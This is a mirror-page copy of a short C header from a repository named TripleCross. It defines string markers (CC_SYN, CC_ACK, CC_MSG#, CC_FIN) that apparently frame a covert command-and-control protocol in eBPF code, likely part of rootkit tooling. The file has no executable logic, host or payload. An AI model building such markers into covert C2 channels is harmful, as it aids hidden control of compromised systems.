mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-25 10:53:09 +08:00
11 lines
218 B
C
11 lines
218 B
C
#ifndef __BPF_CC_H
|
|
#define __BPF_CC_H
|
|
|
|
#define CC_PROT_SYN "CC_SYN"
|
|
#define CC_PROT_ACK "CC_ACK"
|
|
#define CC_PROT_MSG "CC_MSG#"
|
|
#define CC_PROT_FIN_PART "CC_FIN"
|
|
#define CC_PROT_FIN CC_PROT_MSG CC_PROT_FIN_PART
|
|
|
|
|
|
#endif |